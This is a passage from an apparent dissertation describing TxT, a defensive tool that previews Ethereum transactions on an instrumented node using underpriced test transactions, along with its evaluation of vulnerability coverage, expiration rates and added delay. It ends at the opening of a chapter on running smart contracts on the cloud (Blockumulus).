tions, this sequence is untestable, potentially vulnerable, or it will expire before the execution of
its last transaction. Therefore, transaction sequences that require time separation between trans-
actions cannot be tested by TxT.
5.5.7: Transaction Execution on an Instrumented Node
Here, we outline some straw-man approaches that might be considered as alternative design choices
for TxT. However, all these approaches suffer from some limitations as illustrated below.
Gossip Delivery: TxT requires the user to switch to the TxT network for transaction testing. It would
be reasonable to consider delivering the test transaction through a normal Ethereum node based
on the assumption that any transaction, even one destined to fail, must arrive at every node in
the network, so that all the nodes could make their own independent rejection judgement. However,
our extensive experiments with transaction underpricing show that this assumption is not always
correct: the nodes often refuse to forward transactions that do not pass
certain “smoke tests” (e.g., minimum gas price), so we cannot rely on the Ethereum gossip protocol
for delivering the test transaction to the TxT node.
Network-layer Propagation Inhibition: We assume that the user has a subscription with a TxT
provider. This allows the provider to compare the from field of the transaction message with the
user database to filter outgoing network packets containing test transactions. However, our exper-
iments show that the attempts to tamper with Ethereum network traffic cause some unpredictable
behavior, such as node stalling and various synchronization errors. Even if we could overcome
these errors by reverse-engineering the software (Go Ethereum, in our case), the reliance on eccen-
tricities of a specific implementation of Ethereum node is not only extremely complicated, but it
could also involve some unforeseeable errors. Thus, we choose to prevent the transaction propaga-
tion through the less intrusive method of transaction underpricing. Moreover, since the wallets ask
users to select the transaction gas price anyway, the requirement to specify a low gas price does not
create a noticeable inconvenience.
Submit Final Transaction via TxT: If a TxT test confirms the safety of a transaction, the user is
required to reconnect to the Mainnet network for submitting the final transaction. This step raises
a question: would it be easier to submit the final transaction through TxT instead, as the TxT node
is essentially a Mainnet node? Unfortunately, this approach might be less convenient for the user
than the one proposed in our design. Submitting the final transaction through TxT would require
pruning and re-synchronizing the TxT node to remove the test transaction from it, which takes some
time; since tested transactions, as we know, are prone to expiration, any unreasonable delay should
be eliminated.
Our TxT Design with Transaction Underpricing: TxT requires the isolated execution of trans-
actions on a fully-synchronized node. We run multiple experiments to determine that the “forced”
solutions, such as gossip firewalling (suppression of transaction propagation), incur unrecoverable
node stalls. Moreover, any extensive modification of a TxT node creates sustainability issues: the
same modifications have to be applied to future releases of the node, resulting in an increased maintenance
overhead. To overcome this challenge, we propose transaction underpricing, a gas price
manipulation scheme that effectively avoids the execution of the transaction by the blockchain network
at large, without creating conditions in which the TxT node cannot re-synchronize with the
Mainnet after the test. To override the rejection of the transaction, we enable the --miner.gasprice 1
CLI option in Go-Ethereum, which effectively overrides the underpriced transaction checks. Since
the London Fork, Ethereum enforces the EIP-1559 proposal [79], which effectively prevents mining
transactions with a very low gas price, making the concern about accidental mining of underpriced
transactions unsubstantiated.
                             Figure 5.4: The workflow of TxT testing.
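The EIP-1559 argument above can be illustrated with a one-line check. Under EIP-1559, a transaction can be included in a block only if its fee cap is at least the block's base fee, and the gas price of a legacy transaction serves as its fee cap. The Python sketch below is a simplification with hypothetical names; the base fee of 20 Gwei in the usage note is an arbitrary illustrative value, not a measurement.

```python
GWEI = 10**9  # Wei per Gwei


def can_be_mined(gas_price_wei: int, base_fee_wei: int) -> bool:
    """EIP-1559 inclusion rule: the fee cap must cover the block's base fee."""
    return gas_price_wei >= base_fee_wei
```

For instance, with an assumed base fee of 20 Gwei, `can_be_mined(1, 20 * GWEI)` is `False` for a test transaction priced at 1 wei, whereas `can_be_mined(25 * GWEI, 20 * GWEI)` is `True`.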
5.5.8: Putting It All Together
Fig. 5.4 shows a successful testing of a single transaction. Without loss of generality, the same
workflow can be applied to a series of two or more transactions. We assume that the user has
an Ethereum wallet with an account and some positive Ether balance. With the minimal
positive gas price of 1 wei/gas, the user needs only 1.35 · 10⁻⁷ USD worth of
Ether (as of November 2021) for a worst-case transaction consuming the entire block gas limit. We
also assume that the user submits a transaction either directly to a smart contract, or uses a dApp as
a front-end for a smart contract (with the wallet connected to this dApp). Next, we describe each
of the nine steps of a successful transaction security testing using TxT.
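The worst-case cost quoted above can be reproduced with a short calculation. The Python sketch below is illustrative only: the block gas limit of 30,000,000 gas and the Ether price of 4,500 USD are assumptions chosen because they are consistent with the quoted figure; neither value is stated in the text.

```python
WEI_PER_ETHER = 10**18


def worst_case_test_cost_usd(block_gas_limit: int,
                             gas_price_wei: int,
                             ether_price_usd: float) -> float:
    """Cost of a transaction that consumes the entire block gas limit."""
    cost_wei = block_gas_limit * gas_price_wei
    return cost_wei / WEI_PER_ETHER * ether_price_usd


# Assumed inputs: 30,000,000 gas limit, 1 wei/gas, 4,500 USD per Ether.
cost = worst_case_test_cost_usd(30_000_000, 1, 4_500.0)
print(f"{cost:.2e} USD")
```

With these assumed inputs, the transaction costs 3 · 10⁷ wei, i.e., 3 · 10⁻¹¹ Ether, which corresponds to about 1.35 · 10⁻⁷ USD.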
      ❶ Unplugging from Distributed Node: Virtually all Ethereum wallets are connected to Mainnet
using a distributed Ethereum Access Service, such as Infura [22] or POKT [24]. In order to test
transactions with TxT, the user should connect to the TxT server.
      ❷ Connecting to TxT Node: Popular advanced Ethereum wallets, such as MetaMask, allow the user to
connect to a custom Ethereum network by providing its address and port. In most wallets, this is a
one-time setup, after which the user can use a drop-down menu to switch between TxT service and
Mainnet.
      ❸ Sending Test Transaction: Once the user switches to the TxT network, which is essentially
the Mainnet network accessed through the TxT Ethereum node, the user submits a transaction as
if it was a usual transaction. This prompts the wallet to show the confirmation dialog, asking the
user to select or manually enter the fee parameters. The user specifies a very low gas price (e.g., 1
wei)⁴⁶. Once the transaction is submitted, TxT immediately begins processing it.
      ❹ Transaction Forwarding: Next, the instrumented node forwards the transaction to the Ethereum
Mainnet network using the gossip P2P protocol. Since we aim at preventing the execution of the
test transaction by the Mainnet network at large, we expect the transaction to be rejected by all other
nodes except the instrumented TxT node due to a very low gas price (i.e., Tp ≪ µ(Tp )) specified
by the user in the wallet.
      ❺ Rejection by Mainnet at Large: Ethereum nodes place transactions into transaction pools,
in which transactions are awaiting execution. Our experiments confirm that severely underpriced
transactions are rejected by most Ethereum nodes early on, without reaching the transaction pools.
      ❻ A Posteriori State: Since the user’s wallet is connected to the TxT network, the state of the TxT
node becomes the ground truth for the wallet or a dApp connected to that wallet. Therefore, the
test transaction rejected by the Mainnet network outside of the TxT node will be seen as executed
by the wallet. We call this situation the a posteriori state, i.e., the state of the blockchain caused by
the execution of the test transaction.
   46 Some wallets prohibit tiny gas prices for Mainnet transactions. However, they do not impose gas price limits on
TxT because it is a custom network.
    ❼ Test Transaction Status: TxT provides the status information for each transaction (delivered
via a web page, API, or other methods). After submitting the transaction, the user will observe
one of the following four test transaction statuses: S1: Transaction is unconditionally testable
(σ-deterministic) and valid (unexpired); S2: Transaction is σ-deterministic, but it is expired; S3:
Transaction is σ-nondeterministic, but TxT found a potential vulnerability; and S4: Transaction is
untestable (σ-nondeterministic and no vulnerabilities found).
    If the transaction is successfully executed and unexpired (S1), the user may submit the
transaction to Mainnet, provided that the a posteriori state is satisfactory. If the transaction is
successfully executed but expired (S2), then the user should repeat the test. If the transaction is
σ-nondeterministic with a potential vulnerability warning (S3), the user cannot rely on TxT for
testing the transaction, but TxT provides a warning facilitating the assessment of risks via
traditional methods. Finally, if TxT determines that the transaction is untestable (S4), then the
transaction cannot be evaluated by TxT.
    ❽ Reconnecting to Distributed Node: If the transaction is testable, unexpired, and the a posteriori
state matches the user’s expectation, then this transaction can be safely submitted to Mainnet for
final execution. In this case, the user switches the wallet back to the Mainnet network node for
submitting the transaction as usual.
    ❾ Submitting Mainnet Transaction: An unexpired σ-deterministic transaction is guaranteed to
have the same outcome as the test transaction. Even if the transaction expires right at the moment it
is submitted, the user can initiate an emergency cancellation of the transaction before it is mined
by following the Ethereum transaction replacement procedure supported by most crypto wallets [86].
    The above procedure shows that a TxT user does not need advanced technical skills (e.g.,
understanding the contract code) and does not need to meticulously investigate the safety of a
planned transaction (or transaction sequence). Moreover, the user assesses the outcome of the test
transaction(s) using familiar interfaces, such as a crypto wallet and/or dApp.
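
    The four statuses and the user action recommended for each of them can be summarized in a short
sketch. This is a minimal illustration rather than the TxT implementation: the names TestStatus,
classify, and next_action are hypothetical, and the three boolean inputs are assumed to be supplied
by the tester.

```python
from enum import Enum


class TestStatus(Enum):
    S1 = "sigma-deterministic and unexpired"
    S2 = "sigma-deterministic but expired"
    S3 = "sigma-nondeterministic, potential vulnerability found"
    S4 = "sigma-nondeterministic, no vulnerability found (untestable)"


def classify(deterministic: bool, expired: bool, vulnerability_found: bool) -> TestStatus:
    """Map the outcome of a test transaction to one of the statuses S1-S4."""
    if deterministic:
        return TestStatus.S2 if expired else TestStatus.S1
    return TestStatus.S3 if vulnerability_found else TestStatus.S4


def next_action(status: TestStatus, state_satisfactory: bool = False) -> str:
    """Return the action suggested by the workflow for a given status."""
    if status is TestStatus.S1:
        # Only an unexpired deterministic test with a satisfactory
        # a posteriori state justifies submitting to Mainnet.
        return "submit to Mainnet" if state_satisfactory else "do not submit"
    if status is TestStatus.S2:
        return "repeat the test"
    if status is TestStatus.S3:
        return "heed the warning and assess risks by traditional methods"
    return "transaction cannot be evaluated"
```

For example, next_action(classify(True, True, False)) yields "repeat the test", which corresponds to
status S2.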


            Table 5.2: Summary of vulnerability coverage by state-of-the-art defense tools.
  Columns: Vulnerability (SWC Registry number†), SWC-100 through SWC-136.
  Rows (defense tools): Oyente [200], Securify [271], Mythril [215], Sereum [240], Vandal [76],
  sGuard [220], ZEUS [168], ConFuzzius [119], VeriSmart [261], SmarTest [260], Osiris [269],
  ECFChecker [137], Maian [223], TxT (our work).
  Legend: full support; partial support; no support; explicit detection of vulnerability.
  †
      https://swcregistry.io/.
5.6: Implementation and Evaluation
In this section, we evaluate our implementation of TxT to confirm the feasibility of its real-world
deployment.
5.6.1: Implementation and Deployment
We implement TxT by instrumenting Go Ethereum 1.10.10 and adding data-processing
modules using Node.js 12.22.5 with Web3.js 1.2.6 and Python 3.9.7. In order to prevent accidental
disruption of the normal Ethereum execution, our instrumentation of Go Ethereum includes only
the minimal necessary modifications, i.e., gathering and saving chain data, and overriding the
lower gas price limit only for specified accounts representing the customers of a TxT server. The
gathered data is then processed independently of the node by external Node.js and Python modules.
      We deploy TxT on a Dell PowerEdge T640 server with two Intel Xeon Gold 5218 CPUs, 250 GB of
RAM, and a SATA SSD (6 Gbps throughput), connected to a 1 Gbps wired Internet link. The
instrumented TxT node uses the full synchronization mode with one CPU mining thread (for enabling
opcode execution) and 8,192 MB of cache. In the current implementation, we use SSH and a text
interface for test transaction status retrieval.
5.6.2: Vulnerability Coverage by TxT
We implement 37 cases reproducing all the cataloged smart contract vulnerabilities in the SWC
Registry [42]. After that, we test all the transaction sequences reproducing these vulnerabilities on a
TxT deployment to assess which vulnerabilities are detectable by TxT. One important aspect of this
assessment is that we judge the ability of TxT to reveal a vulnerability not only based on our sample
implementation, but also based on the ability to address all possible vulnerable implementations.
We compare TxT with 13 state-of-the-art defenses based on their self-reported coverage disclosure.
    The result, shown in Table 5.2, demonstrates that TxT significantly outperforms all the
state-of-the-art tools in terms of the number of vulnerabilities it is able to defend against.
Specifically, all the state-of-the-art tools combined detect and/or prevent only 15 out of 37
vulnerabilities (40.5% coverage), while TxT deterministically prevents 31 out of 37 (83.8%
coverage). Furthermore, if we add the warnings of potential insecurity to our assessment, the
vulnerability coverage by TxT reaches 89.2% (33 out of 37).
    Some vulnerabilities, such as SWC-105, SWC-115, and SWC-134, are semantic-dependent, i.e.,
they rely upon understanding of the intent of the developer and/or user, and therefore they are only
supported by the heuristic tools. For example, a pattern corresponding to SWC-105 (“Unprotected
Ether Withdrawal”) is perceived as a dangerous omission in most contracts, but the same behavior
could be correct if the contract is designed to be an Ether faucet. Moreover, SWC-136
(“Unencrypted Private Data On-Chain”) still remains unsupported by all existing tools, including
TxT. Addressing this vulnerability would require the identification of a leaked secret, which is an
insurmountable task.


Table 5.3: Number (×10^6) and percentage of accounts exhibiting state retention within set time
threshold.
                                                   State retention threshold (θexp)
  Counting condition                           60 sec.            600 sec.           3600 sec.
  All txns testable (min(∆t) > θexp)       122.38 (93.19%)    115.11 (87.65%)    109.68 (83.52%)
  Avg. txns testable (µ(∆t) > θexp)        124.80 (95.04%)    121.50 (92.52%)    119.08 (90.67%)
  90% testable (P90%(∆t) > θexp)           124.86 (95.08%)    121.59 (92.59%)    119.19 (90.76%)
5.6.3: Transaction Expiration Rate
TxT tests are prone to expiration due to the constantly changing state of the blockchain. In this
evaluation, we gather over 1.3 billion transactions (from the Genesis block until November 5, 2021)
submitted to over 131 million Ethereum accounts (smart contracts and EOAs) to find the percentage
of accounts resilient to transaction expiration. To assess the transaction expiration resiliency, we
pick three time thresholds (1 minute, 10 minutes, and 1 hour), and we group all accounts into three
categories: 1) the ones that have never experienced transaction expiration within the set threshold;
2) the ones whose transactions on average (mean) do not expire before the threshold; and 3) the
ones with 90% or more transactions not expiring before the set threshold, as shown in Table 5.3.
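
    The three counting conditions can be illustrated with a small sketch. It assumes that ∆t denotes
the time gaps (in seconds) between consecutive state-changing transactions of one account, which is
our reading of the notation in Table 5.3; the function name retention_categories and the sample
values are hypothetical.

```python
from statistics import mean


def retention_categories(gaps, theta_exp):
    """Evaluate the three counting conditions for one account.

    gaps      -- time gaps (seconds) between consecutive transactions (assumed meaning of delta-t)
    theta_exp -- state retention threshold in seconds
    """
    if not gaps:
        raise ValueError("at least one gap is required")
    # Share of gaps that are longer than the threshold, i.e., tests that would not expire.
    surviving = sum(1 for g in gaps if g > theta_exp) / len(gaps)
    return {
        "all_testable": min(gaps) > theta_exp,   # condition 1: never expires
        "avg_testable": mean(gaps) > theta_exp,  # condition 2: does not expire on average
        "p90_testable": surviving >= 0.9,        # condition 3: 90% or more do not expire
    }
```

For instance, an account with gaps of 30, 700, 5000, and 8000 seconds satisfies only the second
condition for the 60-second threshold, because one gap is shorter than the threshold.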
    The experimental result demonstrates that statistically the vast majority of test transactions
will not expire within a reasonable time, sufficient for submitting the final transaction to Mainnet.
However, if the test expires before the final Mainnet transaction is submitted, the user can
repeat the test, and the probability of success after multiple tests will be
$P_{succ} = 1 - (1 - P_{single})^k$, where $P_{single}$ is the probability of success for a single
test within the given time threshold, and $k$ is the number of attempts. Thus, even if a transaction
expires before the user submits the final one, a repeated test will address the problem, as shown in
Fig. 5.5.


                 Figure 5.5: Probability of avoiding expiration via repeated testing.
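
    The effect of repeated testing can be reproduced numerically. The sketch below evaluates the
success probability of k independent attempts; the function name p_success is hypothetical, and
using a Table 5.3 percentage as the single-test probability is an illustrative assumption only.

```python
def p_success(p_single: float, k: int) -> float:
    """Probability that at least one of k independent tests does not expire."""
    if not 0.0 <= p_single <= 1.0:
        raise ValueError("p_single must be a probability")
    if k < 1:
        raise ValueError("k must be a positive integer")
    return 1.0 - (1.0 - p_single) ** k


if __name__ == "__main__":
    # Illustrative assumption: single-test success probability of 0.8352
    # (the most pessimistic share reported in Table 5.3).
    for attempts in range(1, 5):
        print(attempts, round(p_success(0.8352, attempts), 6))
```

Under this assumption, two attempts already raise the success probability above 0.97.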
5.6.4: σ-nondeterministic Transactions
In this work, we propose a paradigm that allows deterministic prediction of the result of a
transaction at the expense of rejecting a small portion of transactions that we call
σ-nondeterministic. TxT is unable to guarantee the outcome of a σ-nondeterministic transaction;
however, we are able to partition these transactions into potentially unsafe (prone to SWC-120 and
SWC-116 vulnerabilities) and untestable (not necessarily vulnerable, but the result is unpredictable).
     Fig. 5.6 shows the result of processing over 1.3 billion Ethereum transactions with opcode
analysis of their execution stacks. The result shows the counts of opcode presence events (i.e.,
several identical opcodes within one call stack count as one event), divided into three groups:
untestable (no vulnerability markers), SWC-120 markers, and SWC-116 markers. The latter two groups
produce respective warnings regarding possible vulnerabilities, while the untestable transactions are
to be rejected by TxT.
     The evaluation shows that approximately 86.27% of all transactions are σ-deterministic and
13.73% are σ-nondeterministic. Out of almost 185 million σ-nondeterministic transactions, only
25.5% are purely untestable, which means that TxT completely rejects about 3.5% of transactions,
and gives at least partial results for 96.5% of transactions. We believe that through a deep opcode
and EVM stack analysis it is possible to further reduce the rate of σ-nondeterministic and untestable
transactions.

Figure 5.6: Occurrence of σ-nondeterministic opcodes in the execution stack of 1.3 billion
Ethereum transactions.
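
    The rejection rate quoted in this subsection follows from multiplying the two reported shares.
The short check below reproduces the arithmetic; the function name rejection_rate is hypothetical,
and the inputs are the rounded percentages stated in the text.

```python
def rejection_rate(nondeterministic_share: float, untestable_share: float) -> float:
    """Share of all transactions that are both sigma-nondeterministic and untestable."""
    return nondeterministic_share * untestable_share


rejected = rejection_rate(0.1373, 0.255)   # 13.73% of all, of which 25.5% are untestable
at_least_partial = 1.0 - rejected          # everything that is not completely rejected

print(f"rejected: {rejected:.1%}, at least partial results: {at_least_partial:.1%}")
```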
5.6.5: Underpriced Transactions in the Wild
The transaction underpricing approach, utilized by TxT, raises a concern: if a block does not have
enough properly priced competing transactions, the underpriced test transaction might be included
in this block [288]. Our evaluation shows that Ethereum Mainnet has 2,506,498 zero-priced
transactions (as of November 2021)47. These transactions have been a known nuisance in the Ethereum
community [87]. Although the rate of zero-priced transactions on Ethereum is only 0.186%, the
very fact of their presence poses a threat to the feasibility of TxT. Fortunately, the EIP-1559 [79]
proposal, which has been enforced since the London hard fork, solves the problem. Although the
protocol adjustment does not explicitly target the zero-priced transactions, it effectively makes
these transactions impossible. To verify this, we process over 111 million transactions submitted
soon after the London fork and confirm that none of them has a gas price lower than 1,423,420,054
wei (see Fig. 5.7). Thus, after the London fork, it is no longer possible to accidentally mine an
underpriced transaction.
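
    The reason EIP-1559 rules out underpriced transactions can be sketched as follows. Under
EIP-1559, every block has a base fee per gas, and a transaction can be included only if its fee cap
is not lower than that base fee; for legacy transactions the gas price acts as the fee cap. The
helper names below are hypothetical, and the base fee value is illustrative (it reuses the minimal
gas price reported above).

```python
def fee_cap(tx: dict) -> int:
    """Return the maximum price per gas (in wei) that the sender is willing to pay.

    EIP-1559 transactions carry maxFeePerGas; legacy transactions carry gasPrice.
    """
    if "maxFeePerGas" in tx:
        return tx["maxFeePerGas"]
    return tx["gasPrice"]


def can_be_included(tx: dict, base_fee_per_gas: int) -> bool:
    """A transaction is eligible for a block only if its fee cap covers the base fee."""
    return fee_cap(tx) >= base_fee_per_gas


ILLUSTRATIVE_BASE_FEE = 1_423_420_054  # wei; illustrative value, not a protocol constant

test_tx = {"gasPrice": 1}  # severely underpriced test transaction (1 wei)
print(can_be_included(test_tx, ILLUSTRATIVE_BASE_FEE))  # the test transaction is not eligible
```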
   47
      For example, 0xc3fa8399ef7922aef0ec7278f7b4b5e28e7191eba3027ca1143af2cf17acae86

Figure 5.7: Minimal accepted gas price of 111,226,625 post-London transactions on Mainnet.
Without loss of correctness, we apply the moving minimum function to the data.
5.6.6: TxT Delays and Transaction Efficiency
TxT is implemented as an instrumented Go Ethereum node incurring some additional transaction
execution delays. Moreover, as TxT continues processing transactions, the transaction execution
delay may increase due to the growing cache size of the TxSEA algorithm. In this part of the
evaluation, we first measure the added per-opcode delay of TxT instrumentation over a large time
period. Then, we make a projection of the added delay of transaction execution by a TxT node.
    For our evaluation experiment, we compare the opcode execution delays between the instrumented
TxT node and a pure Go Ethereum node. The experiment was conducted on the same Dell PowerEdge
T640 server as the rest of the experiments. The time-critical core module of TxT is repeatedly
invoked in the opcode processing loop of the Run function in core/vm/interpreter.go.
We activate TxT for historical Mainnet transactions, and collect timestamps at every iteration of
the loop, which gives us the delay of execution of a single opcode. After that, we remove all the
TxT code from the node, leaving only the timestamp collection instruction, and execute the same
transactions again, this time without TxT. To better visualize the data without loss
of generality, we collect the execution delays of 500 million executed opcodes, both with and
without TxT, and split them into 500 frames, each containing 1 million opcodes. Then, for
each of the frames, we plot the difference between the average instrumented and non-instrumented
delays, which we call the added delay (i.e., the difference in opcode processing delay between TxT
and the baseline approach, see Fig. 5.8). The result shows that despite the growing TxSEA cache,
TxT does not exhibit any noticeable growth in added opcode processing delay. Moreover, the average
added delay for each frame stays between 2,300 and 3,000 nanoseconds per opcode.

Figure 5.8: Additional time (in nanoseconds) that the instrumented TxT node spends on average
for executing one opcode compared to the baseline non-instrumented node. Despite growing cache
size, the execution delay is not visibly increasing even after 500 million processed opcodes. Each
measurement is an average over one of 500 frames, each with 1 million opcodes.
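
    The per-frame added delay described above can be computed as in the following sketch. It is not
the measurement code used in the experiment: the function name added_delay_per_frame is
hypothetical, and the two inputs are assumed to be equally long lists of per-opcode delays (in
nanoseconds) recorded for the same opcodes with and without the instrumentation.

```python
from statistics import mean


def added_delay_per_frame(instrumented_ns, baseline_ns, frame_size):
    """Return, for each frame, mean(instrumented) - mean(baseline) in nanoseconds."""
    if len(instrumented_ns) != len(baseline_ns):
        raise ValueError("both runs must cover the same opcodes")
    if frame_size < 1:
        raise ValueError("frame_size must be positive")
    added = []
    for start in range(0, len(instrumented_ns), frame_size):
        inst_frame = instrumented_ns[start:start + frame_size]
        base_frame = baseline_ns[start:start + frame_size]
        added.append(mean(inst_frame) - mean(base_frame))
    return added
```

With 500 million delays and a frame size of 1 million, the function returns the 500 values that are
plotted as one curve.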
    In our next experiment, we count the number of opcodes executed by a sample of 100 million
transactions in Ethereum Mainnet. Then, we create a distribution of the transaction opcode
counts, shown in Fig. 5.9. As we can see, the vast majority of transactions execute fewer than 5,000
opcodes. Combined with the previous result that most added opcode execution delays are under
3,000 nanoseconds, this means that for the vast majority of transactions the added delay caused by
the TxT implementation does not exceed $3{,}000 \cdot 5{,}000 \cdot 10^{-6} = 15$ ms.
Assuming that the sequence of transactions in a tested workflow does not exceed 10, the TxT delay
per test will not be larger than 150 ms, which is negligible. The state-of-the-art smart contract
tester ConFuzzius [119], which claims enhanced time performance compared to previous testers,
requires 500 to 1,000 seconds to achieve 75% instruction coverage. Compared to ConFuzzius, TxT
delivers an almost instant result because it dynamically tests transactions against the current
state of the blockchain.
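
    The delay projection is a simple product of the per-opcode delay, the opcode count, and the
length of the tested sequence. The sketch below reproduces it; the function name added_delay_ms is
hypothetical, and the inputs are the upper bounds quoted in this subsection.

```python
NS_PER_MS = 1_000_000  # nanoseconds in one millisecond


def added_delay_ms(delay_per_opcode_ns: float, opcodes_per_tx: int, txs_per_test: int = 1) -> float:
    """Projected added delay (in milliseconds) of one test with txs_per_test transactions."""
    return delay_per_opcode_ns * opcodes_per_tx * txs_per_test / NS_PER_MS


print(added_delay_ms(3_000, 5_000))      # one transaction
print(added_delay_ms(3_000, 5_000, 10))  # a workflow of 10 transactions
```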


Figure 5.9: Number of executed EVM opcodes per transaction, based on the sample of 100 million
transactions.
    Last, but not least, we evaluated the performance and feasibility of TxT over the Proof-of-Stake
consensus that was recently adopted by the Ethereum network. Except for the necessity to update
several command-line parameters, we did not notice any performance or other difference between
TxT operating on Proof-of-Work consensus versus Proof-of-Stake.
5.7: Limitations and Discussion
This is the first work on a deterministic approach to smart contract testing using transaction
encapsulation. We believe that our work opens up a new era of non-heuristic audit of smart contracts.
However, the paradigm shift comes with some remaining challenges and open questions.
Testing Eligibility: The current implementation of TxT provides a practical proof of concept of the
transaction encapsulation framework. However, the rate of σ-nondeterministic transactions is still
high. Our evaluation shows that the major culprits are the NUMBER and BALANCE opcodes in the call
stacks of the tested transactions. However, we observed that the conditional statements involving
the NUMBER opcode often turn into tautologies or contradictions when $T_{b,i}$ is larger than a
certain value. In other words, we have sufficient reason to believe that the rate of σ-nondeterministic
transactions can be drastically reduced by designing more fine-tuned procedures for identifying
σ-nondeterministic transactions.


State Expiration: Blockchain is a dynamic multi-user environment in which executed transactions
constantly interfere with one another. This interference is the cause of TxT test expiration.
In this work, we use a coarse assumption $T_{b,j} > T_{b,i} \wedge T_{t,j} = T_{t,i}$ for determining
transaction expiration. However, we believe we can significantly reduce the rate of expiration by
exploring the execution stacks of purportedly interfering transactions and determining which of them
effectively interfere with the test transaction.
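
The coarse expiration condition can be expressed as a short predicate. The sketch assumes that the
first subscripted attribute is the block number of a transaction and the second one is its target
account; this reading of the symbols, as well as the names Tx and is_expired, are assumptions made
for illustration.

```python
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Tx:
    block: int   # assumed meaning of T_b: block number of the transaction
    target: str  # assumed meaning of T_t: target account of the transaction


def is_expired(test_tx: Tx, observed: Iterable[Tx]) -> bool:
    """Coarse check: the test expires if any later transaction hits the same target."""
    return any(
        tx.block > test_tx.block and tx.target == test_tx.target
        for tx in observed
    )
```

A finer analysis, as suggested above, would replace the equality of targets with an inspection of
the execution stacks to decide whether the later transaction actually affects the tested one.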
Custom RPC Support by Crypto Wallets: The TxT design assumes that the user’s wallet, which is
the proxy to the Ethereum ecosystem, supports adding a custom RPC network. While
most popular wallets support this feature, some other wallets (e.g., MyEtherWallet [23]) do not.
However, in the spirit of decentralization and trust elimination, most Ethereum wallets are
open-source, which makes it easy to add a modification or plugin for supporting a custom RPC.
Transactions from Multiple Accounts: The current design of TxT assumes that the entire
transaction sequence originates from the same account, which is by far the most obvious scenario.
However, we also admit that some transaction sequences might require testing involving several
accounts, such as in the case of multi-signature distributed token wallets. Although the multi-account
support is deliberately removed from the current design to avoid unnecessary complication, our
analysis indicates that implementing this functionality is tantamount to improving some
bookkeeping routines in the current design.
Deployment Scalability: The current implementation of TxT does not allow running multiple testing
sessions on one instrumented node, which means that the TxT security provider must maintain a
sufficient number of separate instrumented Ethereum nodes to accommodate all simultaneous
testing requests. On the one hand, the computation cost is not a big concern because TxT
instrumented nodes do not require competitive mining. On the other hand, each node must be fully
synchronized, with approximately 500 GB of per-node storage requirement. Yet, we believe it is
possible to orchestrate testing to allow execution of non-conflicting transactions on the same node.
We leave this functionality for future research.


5.8: Chapter Summary
Traditional software often requires user confirmation of critical operations, such as deleting records
or submitting web-based applications. Implementing the same mechanism in smart contracts is
notoriously hard due to the TOCTOU issue caused by the ever-changing state of the
blockchain. In this work, we provided the first solution to address this problem by allowing a
user to preview and confirm transactions. To make it feasible, we formally determined the exact
set of conditions for transaction replicability and introduced transaction encapsulation, a new
framework for deterministic real-time transaction testing, which uncovers the outcome of the
intended transactions or transaction sequences. Transaction encapsulation could effectively capture
the unpredictable behaviors associated with known and zero-day vulnerabilities. We developed
and implemented the transaction tester TxT. Through extensive experiments, we demonstrated that
TxT prevents the exploitation of more than twice as many vulnerabilities as covered by the existing
defense tools combined. In the spirit of open research, we will make TxT and all the evaluation
artifacts open source.


CHAPTER 6: SMART CONTRACTS ON
THE CLOUD48
6.1: Introduction
Bitcoin is the first decentralized digital currency powered by blockchain with proof-of-work (PoW)
consensus, which effectively prevents data tampering by anyone with less than half of the total
computational power of the network [216]. Recently, Dembo et al. delivered a formal proof of
the correctness of the above statement with respect to the original PoW Nakamoto consensus [106].
Although Bitcoin’s original purpose was to serve as a cryptocurrency transaction ledger, the unique
properties of blockchain soon attracted researchers and engineers to re-purpose the technology for
a plethora of decentralized applications, commencing the era of smart contracts.
       Smart contracts are decentralized immutable programs that allow establishing custom
mediator-free protocols between parties that do not trust one another. For example, a smart contract
can be used to help conduct an election in a decentralized manner [144, 275]. Another popular use
case is fungible tokens, which can represent corporate shares, gift card balances, and even custom
currencies. Recently, researchers and businesses proposed a wide variety of smart contract
applications [159, 237, 239], some of which have already been adopted by national governments and
large industries [286]. However, the unique features of blockchain and smart contracts come at the
high price of mediocre performance and bounded scalability.
       One way to address the performance and scalability issues of blockchain is to use a private
permissioned blockchain framework, such as Hyperledger Fabric [53], which only uses pre-installed
smart contracts (called chaincode) and splits the voting power between a small number of fixed
participants. Although such blockchains deliver performance improvement over public blockchains,
the requirement to establish a trustworthy consortium of organizations running these blockchains
prevents their wide adoption in many applications, such as cryptocurrencies and decentralized
voting. Thus, public blockchains cannot be replaced by permissioned ones.
    48
       This chapter is based on previously published work by Nikolay Ivanov, Qiben Yan and Qingyang Wang
titled “Blockumulus: A Scalable Framework for Smart Contracts on the Cloud” published at the Proceed-
ings of the 2021 IEEE 41st International Conference on Distributed Computing Systems (ICDCS). DOI:
10.1109/ICDCS51616.2021.00064 [162]. © 2021 IEEE. Reprinted, with permission, from Nikolay Ivanov, Qiben
Yan and Qingyang Wang “Blockumulus: A Scalable Framework for Smart Contracts on the Cloud” (paper and IEEE
titles are the same), July 2021.
     Recently, a number of solutions have been developed to address the inherent performance
and scalability issues of public blockchains, including partial off-chain computation [98],
side-chaining [231], cross-chaining [287], sharding [130, 298], payment channels [110, 232], efficient
consensus protocols [68], new blockchain architectures [262], and network optimizations [90].
However, all these solutions suffer from at least one of the following limitations. First, they cannot
deliver scalability in transaction throughput, data storage, and computation capacity at the same
time. Second, the performance improvement is often incremental and could be insufficient for
many applications, such as retail payments. Third, they either do not support smart contracts, or
their smart contracts are not Turing-complete [209], making it impossible to realize certain
programming patterns. A recent blockchain scalability survey by Zhou et al. [308] concludes that a
desired solution still has not been found. In this work, we propose a conceptually new approach to
the blockchain scalability problem: we use an existing blockchain as-is to enable smart contracts
on an already scalable system: the cloud.
Observation 1. Centralized Service for Scalable Decentralized Contracts: The operation of
decentralized systems is often supported by underlying centralized and/or permissioned services.
For example, the decentralization of Domain Name System (DNS) is based on the assumption that
the Internet Corporation for Assigned Names and Numbers (ICANN), which oversees the system,
is functional and trustworthy [170]. Such a pattern is also observed in public blockchains. Kwon et
al. [180] formally demonstrate that classic public blockchains exhibit partial centralization incurred
by the concentration of compute power around a few mining pools. Moreover, the decentralized nodes
of blockchains use the Internet as a communication medium, which is in turn enabled by a
network of centralized routers and Internet service providers (ISPs), whose owners must comply
with the regulations of local and federal jurisdictions. In this work, we extrapolate the above
principle (i.e., the reconciliation of centralization and decentralization) to show that it is feasible
and beneficial to build an environment that uses a centralized cloud as an underlying communication,
storage, and compute service for decentralized smart contracts. Particularly, this work demonstrates
that cloud resources, such as storage and computation, can be treated as a utility (offered by a third
party), which can support the operation of a decentralized network.
Observation 2. High Cost of Permissionless Network: Public blockchains are supported by
